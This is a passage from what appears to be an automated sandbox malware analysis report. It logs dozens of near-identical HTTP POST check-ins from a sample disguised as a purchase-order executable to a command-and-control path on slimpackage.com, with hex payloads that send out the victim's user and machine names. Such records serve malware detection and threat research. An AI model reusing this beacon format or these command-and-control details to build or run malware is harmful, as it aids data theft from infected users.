                    Date: Fri, 14 Jan 2022 06:16:00 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    26 | 192.168.2.4 | 49793 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:03.275393009 CET | 1390 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:03.397876978 CET | 1391 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:03.527699947 CET | 1391 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:02 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    27 | 192.168.2.4 | 49794 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:04.521631956 CET | 1392 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:04.644192934 CET | 1392 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:04.775456905 CET | 1392 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:03 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    28 | 192.168.2.4 | 49795 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:05.921415091 CET | 1393 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:06.043971062 CET | 1393 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:06.174947023 CET | 1394 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:05 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    29 | 192.168.2.4 | 49797 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:07.332344055 CET | 1473 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:07.455298901 CET | 1486 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:07.593718052 CET | 1521 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:06 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    3 | 192.168.2.4 | 49768 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:15:18.393620968 CET | 1248 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:18.518191099 CET | 1248 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:18.650015116 CET | 1249 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:17 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    30 | 192.168.2.4 | 49804 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:08.825263977 CET | 1624 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:08.949115038 CET | 1625 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:09.082606077 CET | 1639 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:07 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    31 | 192.168.2.4 | 49823 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:12.085515976 CET | 2197 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:12.209481001 CET | 2199 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:12.347671986 CET | 2200 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:11 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    32 | 192.168.2.4 | 49833 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:14.147581100 CET | 2219 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:14.301525116 CET | 2219 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:14.442856073 CET | 2220 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:13 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    33 | 192.168.2.4 | 49834 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:17.416397095 CET | 2221 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:17.540833950 CET | 2221 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:17.672099113 CET | 2221 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:16 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    34 | 192.168.2.4 | 49835 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:20.386728048 CET | 2222 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:20.510426044 CET | 2222 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:20.641201019 CET | 2224 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:19 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    35 | 192.168.2.4 | 49841 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:24.539316893 CET | 10035 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:24.661875010 CET | 10036 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:24.792671919 CET | 10036 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:23 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    36 | 192.168.2.4 | 49842 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:28.261720896 CET | 10037 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:28.386477947 CET | 10037 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:28.518954039 CET | 10037 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:27 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    37 | 192.168.2.4 | 49843 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:30.749545097 CET | 10038 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:30.872180939 CET | 10038 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:31.008444071 CET | 10039 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:29 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    38 | 192.168.2.4 | 49845 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:33.019782066 CET | 10841 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:33.144319057 CET | 10841 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:33.277029037 CET | 10841 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:32 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    39 | 192.168.2.4 | 49846 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:34.831557989 CET | 10842 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:34.956110001 CET | 10842 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:35.088538885 CET | 10843 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:33 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    4 | 192.168.2.4 | 49769 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:15:19.695573092 CET | 1250 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:19.846723080 CET | 1250 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:20.016736984 CET | 1250 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:18 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    40 | 192.168.2.4 | 49852 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:36.784149885 CET | 10855 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:36.908672094 CET | 10856 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:37.041826010 CET | 10856 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:35 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    41 | 192.168.2.4 | 49857 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:38.818540096 CET | 10867 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:38.943881989 CET | 10870 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:39.078356028 CET | 10871 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:37 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    42 | 192.168.2.4 | 49864 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:40.128746986 CET | 10882 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:40.274898052 CET | 10884 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:40.411902905 CET | 10885 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:39 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    43 | 192.168.2.4 | 49871 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:41.470923901 CET | 10898 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:41.612869024 CET | 10900 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:41.745306969 CET | 10901 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:40 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
